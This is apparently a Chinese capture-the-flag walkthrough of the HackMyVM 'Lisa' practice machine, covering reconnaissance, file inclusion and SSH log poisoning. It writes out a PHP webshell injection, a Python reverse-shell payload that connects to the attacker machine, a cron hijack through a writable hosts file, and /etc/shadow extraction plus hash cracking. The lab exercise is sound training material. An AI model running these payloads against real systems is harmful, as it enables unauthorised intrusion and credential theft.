靶机信息
下载地址:
https://hackmyvm.eu/machines/machine.php?vm=Lisa
网盘链接:https://pan.baidu.com/s/1OjMwuU6F1V98x2UnLz-eHA?pwd=xcvx
靶场: HackMyVm.eu
靶机名称: Lisa
难度: 中等
发布时间: 2021年6月16日
提示信息:
无
目标: user.txt和root.txt
实验环境
攻击机:VMware kali 10.0.0.3 eth0桥接互联网,eth1桥接vbox-Host-Only
靶机:Vbox linux IP自动获取 网卡host-Only
信息收集
扫描主机
扫描局域网内的靶机IP地址
fping -ag 10.0.0.0/24 2>/dev/null
扫描到主机地址为10.0.0.156
扫描端口
扫描靶机开放的服务端口
sudo nmap -sC -sV -p- 10.0.0.156 -oN nmap.log
扫描到22和80端口开放,先来看看80端口
Web渗透
访问后是Apache的默认页面,做个目录扫描
gobuster dir -u http://10.0.0.156 -w ~/HackTools/Dict/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt
竟然扫不到路径,估计哪里漏了,重新再来检查一遍。
在Apache默认页面中发现域名,绑定后再来访问
sudo vi /etc/hosts
绑定后访问页面上只有一张图片,做个目录扫描
gobuster dir -u http://vinci.hmv -w ~/HackTools/Dict/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt
还是没有扫描到,暴破下子域名
ffuf -H 'HOST: FUZZ.vinci.hmv' -u http://vinci.hmv -w ~/HackTools/Dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -fs 10719
绑定域名后再来访问看看内容
http://secret.vinci.hmv/
访问后还是一张图片,再次目录扫描
gobuster dir -u http://secret.vinci.hmv -w ~/HackTools/Dict/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt
这回有发现了file.php,猜测是文件读取,验证一下
http://secret.vinci.hmv/file.php?file=/etc/passwd
需要模糊测试参数
ffuf -u http://secret.vinci.hmv/file.php?FUZZ=/etc/passwd -w ~/HackTools/Dict/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -fs 0
找到参数command,来读取下内容
http://secret.vinci.hmv/file.php?command=/etc/passwd
发现用户leonardo,继续读取文件
http://secret.vinci.hmv/file.php?command=/var/log/apache/access.log
apache的日志读取不到(可以猜到日志太多无法读取),尝试读取ssh登录日志
http://secret.vinci.hmv/file.php?command=/var/log/auth.log
可以读取,向ssh写入一句话木马,
ssh '<?php system($_GET['haha']); ?>'@10.0.0.156
验证是否写入
http://secret.vinci.hmv/file.php?command=/var/log/auth.log&haha=id
访问成功,尝试反弹shell到攻击机
1。攻击机监听4444端口
nc -lvvp 4444
2。执行反弹payload
http://secret.vinci.hmv/file.php?command=/var/log/auth.log&haha=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.3",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
反弹成功,切换到交互式shell再找找敏感信息
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+z快捷键
stty raw -echo;fg
reset
切换成功,上传个pspy64检查后台是否有程序自动运行
1。攻击机在pspy64目录下开启HTTP服务
python3 -m http.server
2。靶机下载pspy64并执行
cd /tmp
wget http://10.0.0.3:8000/pspy64
chmod +x pspy64
./pspy64
发现后台有个脚本定时运行,来看看是什么程序
cd /opt
ls
cat cron.sh
在/opt目录下的cron.sh脚本,该脚本会连接到shelly.lisa.hmv地址的65000端口,来看一下shelly.lisa.hmv是否绑定地址
cat /etc/hosts
可以看到shelly.lisa.hmv并没有绑定有效IP,只需要修改这个IP地址即可反弹shell到攻击机上,来看看如何修改hosts文件
ls -al /etc/hosts
发现该文件可以直接修改(修改后保存时需要wq!强制保存,删除地址时建议用delete键)
vi /etc/hosts
修改完成,到攻击机并监听65000端口并等待连接
nc -lvvp 65000
连接成功,切换到交互式shell,并查找可利用信息
ls
cat user.txt
拿到user.txt继续找
sudo提权
sudo -l
发现可以使用root用户身份执行/usr/bin/efax,来看看efax如何提权
https://gtfobins.github.io/gtfobins/efax/
可读取文件,来验证下
sudo efax -d /etc/shadow
拿到root帐号加密后的密码,我们来暴破下
密码暴破
echo 'root:$6$RnHOYwKvoinsNFhF$zdIHAyW0TtHpAfnUc2p2bEPaHTuu/vdRFcTOSzOokSflUo/YoqDU3NzSCtm9VRELG53fGVrfen1PNBKGt6gix0:18792:0:99999:7:::' >shadow
john shadow
拿到密码,切换到root用户
su
拿到root.txt,游戏结束
原文始发于微信公众号(伏波路上学安全):渗透测试靶机练习No.87 Lisa
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论